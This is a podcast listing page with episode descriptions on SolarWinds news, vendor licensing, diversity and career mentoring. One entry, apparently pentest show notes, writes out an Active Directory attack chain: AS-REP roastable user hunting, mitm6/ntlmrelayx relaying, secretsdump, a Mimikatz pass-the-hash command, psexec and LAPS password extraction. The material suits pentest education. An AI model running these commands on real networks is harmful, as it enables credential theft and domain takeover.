The latest on the SolarWinds hack, a lot of ransomware activity, and healthcare hit hard by cyber attacks
Play • 25 min
On this week’s Cyber Security Brief, the first of 2021, Dick O’Brien brings us a comprehensive update about some of the developments in the SolarWinds hack story, with a lot having happened since our last podcast. We also discuss some recent ransomware attacks, and how the healthcare sector is having a hard time with cyber attacks at the moment. Listen at Symantec Enterprise Podcasts
7 Minute Security
7 Minute Security
Brian Johnson
7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: * I got to use some of my new CRTP skills! * Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired * Check for misconfigured LAPS installs with Get-LAPSPasswords! * The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! * When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies! * SharpShares is a cool way to find shares your account has access to. * I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information * Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example: sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin! * Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun! * Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)
52 min
CISO-Security Vendor Relationship Podcast
CISO-Security Vendor Relationship Podcast
Mike Johnson and David Spark
Would You Look at that Unrealistic Licensing Deal?
All links and images for this episode can be found on CISO Series https://cisoseries.com/would-you-look-at-that-unrealistic-licensing-deal/ CISOs know that salespeople want to make the best licensing deal they can possibly get. But unpredictability in the world of cybersecurity makes one-year licensing deals tough, and three-year licensing deals impossible. This episode is hosted by David Spark (@dspark), producer of CISO Series and Mike Johnson. Our guest this week is Mark Eggleston, (@meggleston) CISO, Health Partners Plans. This recording was recorded live in front of a virtual audience at the "SecTalks - Leading with grit in security" virtual conference brought to you by our sponsor, Cobalt. Thanks to our podcast sponsor, Cobalt Cobalt offers a faster more effective pentesting solution through its Pentest as a Service (PtaaS) platform. With it, you can schedule a pentest in as little as 24 hours for all kinds of assets. The platform also connects you with a global pool of pentesters called the Cobalt Core, whose skills can match what you need. And instead of sending you a huge PDF that raises more questions you can’t answer, they engage with your team throughout the pentest. Findings can land straight into Jira and GitHub, helping you fix vulnerabilities as soon as they’re discovered. Cobalt makes pentesting easy, quick to deploy, scalable, and simple to remediate. On this week's episode Why is everybody talking about this now? A redditor is struggling and overwhelmed! The person is in school studying, working, and loving cybersecurity, but has completely and utterly failed the foundations course and is on academic probation. The person told their story to the cybersecurity subreddit community, and the support came out in droves. We've seen this before. People hit a major wall professionally and they just reach out to the anonymous masses for support. The story hits a nerve and the community is eager to show encouragement. In fact, just this past week, the New York Times had an article about the unemployment subreddit offering advice and information to those struggling. We'll take a look at this tactic of reaching out for support and guidance through discussion boards. What do you think of this vendor marketing tactic? "Pro tip to vendors: don’t claim that you can’t do a one-year licensing deal. You might end up with a zero-year license deal", said Ian Amit, CSO, Cimpress on LinkedIn. We'll look at the art of negotiating a contract with a vendor: What is it ultimately you want? What are you willing to concede on and what must you have? And what are the situations that cause this to change? It's time to play, "What's Worse?!" Jason Dance of Greenwich Associates suggests two scenarios that others believe is security, but actually isn't. If you haven’t made this mistake, you’re not in security On Twitter, the CISO of Twitter, Rinki Sethi, said, "A career mistake I made, I rolled out a phishing testing program before the company was ready for it. The HR team said it was against the company culture and if I tried a trick like that again, I would be fired. Lesson - communication is important in #cybersecurity." Rinki asked for others' stories of failure. Let's explore a few. What Is It and Why Do I Care? For this week's game, the topic is vulnerability management. We look at four pitches from four different vendors. Contestants must first answer what "vulnerability management" is in 25 words or less, and secondly must explain what's unique about their vulnerability management solution. These are based on actual pitches - company names and individual identities are hidden. The winners will be revealed at the end.
38 min
Hacker Valley Studio
Hacker Valley Studio
Hacker Valley Media
We Are Here Finale: Rep. Yvette Clarke
Hacker Valley Studio presents: We Are Here - an audio journey and series exploring black excellence in technology and cybersecurity. In part three of this series, Ron and Chris interview Congresswoman Yvette Clarke, serving as the U.S. Representative for New York's 9th congressional district since 2013. Congresswoman Clarke’s parents immigrated to Brooklyn, New York in the 1950s from Jamaica. Being born from immigrant parents and witnessing the transformation of the country during the civil rights movement helped shape her worldview. Congresswoman Clarke mentions that the nurture from her family and community sparked her interest in public service at an early age. Congresswoman Clarke recalls being a child and looking up to her pediatrician, Dr. Thompson. Congresswoman Clarke could see herself being like Dr. Thompson and that led her to pursue her interests in STEM in grade school and college. When Congresswoman Clarke went away to college she made a commitment to come back to Brooklyn and use her education to help others As the episode progresses, Congresswoman Clarke mentions her parents were engaged in the community out of necessity. They wanted to be able to navigate the United States and create community for her and her brother. Congresswoman Clarke’s mother started her community outreach at Parent Teacher Association meetings and was encouraged to run for political office after some time. In fact, Congresswoman Clarke became the first and only child to succeed a parent in political office. Congresswoman Clarke describes community as essential and building communities is done through education. Digital transformation has enabled all generations to collaborate on common causes that they previously wouldn’t have had the opportunity to. An example that Congresswoman Clarke provides is narrowing the education gap for children of color. Through technology, parents have been working with government agencies and private organizations to provide more resources to schools in need. Impactful Moments: 0:00 - Hacker Valley Studio presents We Are Here Pt 3 0:52 - Congresswoman Yvette Clarke on Hacker Valley Studio! 1:56 - Early life and how Congresswoman Clarke made it into office 3:38 - What inspired Congresswoman Clarke to help others 7:21 - Surprises while in office and servicing the public 13:35 - Congresswoman Clarke’s story of perseverance 16:36 - The importance of community and how to influence yours 24:40 - Education and mentorship 27:51 - Using technology to course correct and amplify your voice 31:59 - Sage wisdom for embarking on your personal journey Follow Congresswoman Yvette Clarke on LinkedIn, Instagram, and Twitter Learn more about Hacker Valley Studio. Support Hacker Valley Studio on Patreon. Follow Hacker Valley Studio on Twitter. Follow hosts Ron Eddings and Chris Cochran on Twitter.
37 min
Cyber Security Interviews
Cyber Security Interviews
Douglas A. Brush | Weekly Interviews w/ InfoSec Pros
#115 – Alyssa Miller: We Are Lacking Empathy
https://www.linkedin.com/in/alyssam-infosec/ (Alyssa Miller) leads the security strategy for https://www.spglobal.com/ratings/en/ (S&P Global Ratings) as Business Information Security Officer (BISO), connecting corporate security objectives to business initiatives. She blends a unique mix of technical expertise and executive presence to bridge the gap that can often form between security practitioners and business leaders. Her goal is to change how we look at the security of our interconnected way of life and focus attention on defending privacy and cultivating trust. A native of Milwaukee, Alyssa began her IT career as a programmer for a Wisconsin-based financial software provider. Her security passion quickly shaped her career as she moved into a leadership role within the ethical hacking team, conducting penetration testing and application assessments along with her team. As a hacker, Alyssa has a passion for security that she evangelizes to business leaders and industry audiences through her work as a cybersecurity professional and through her various public speaking engagements. When not engaged in security research and advocacy, she is also an accomplished soccer referee, guitarist, and photographer. In this episode, we discuss why she misses conferences, starting with computers at an early age, diversity, equity, and inclusion, the discrimination she has faced, the lack of understanding of privilege, discriminatory hiring practices, how to be an ally, and so much more! Where you can find Alyssa: https://www.linkedin.com/in/alyssam-infosec/ (LinkedIn) https://twitter.com/AlyssaM_InfoSec (Twitter) https://alyssasec.com/ (Alyssa In-Security) https://www.thinkers360.com/tl/AlyssaMiller (Thinkers360)
51 min
Cyber Work
Cyber Work
Infosec
Launch your cybersecurity career by finding a mentor
Learn how mentors in the cybersecurity community can help launch your career on today’s episode featuring Mike Gentile, the Founder and CEO of CISOSHARE. Mike discusses the CyberForward program, which creates a mentorship and support system for new students of cybersecurity — often those with diverse cultural or economic backgrounds! CyberForward addresses not just skills training, but quality of life issues that might prevent entrance to the security field. If you’re feeling blocked and unsure how to enter the industry, you’ll really want to hear this episode! 0:00​ - Intro  2:24 - Starting a career in cybersecurity 5:39​ - Creating CISOHandbook.com 7:35 - What is CISOSHARE? 9:38​ - What is CyberForward? 11:15​ - Thoughts on the cybersecurity skills gap  17:40​ - Mentoring students through CyberForward 25:13​ - The training value system is broken 29:33 - Creating a network of support 32:44 - Helping the “beaten down” break through 36:52 - What’s next for CyberForward? 39:15 - Advice for getting started in cybersecurity 43:28​ - Outro Have you seen our new, hands-on training series Cyber Work Applied? Tune in every other week as expert Infosec instructors teach you a new cybersecurity skill and show you how that skill applies to real-world scenarios. You’ll learn how to carry out different cyberattacks, practice using common cybersecurity tools, follow along with walkthroughs of how major breaches occurred, and more. And it's free! Click the link below to get started. – Learn cybersecurity with our FREE Cyber Work Applied training series: https://www.infosecinstitute.com/learn/  – View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast Mike Gentile is the Founder, President and CEO of CISOSHARE, headquartered in San Clemente, CA. He has led the company since inception to become a global leader in security program services and solutions. Initially an experiment, the CISOSHARE culture centers around learning and teaching to make the confusing security discipline understandable. In 2019, Mike founded CyberForward Academy by CISOSHARE using this learning and teaching culture to address both the cybersecurity resource shortage and the livable wage gap issues felt in many communities. This partner-enabled professional development program identifies and then rapidly develops effective job-ready cybersecurity professionals. About Infosec Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.
44 min
More episodes
Search
Clear search
Close search
Google apps
Main menu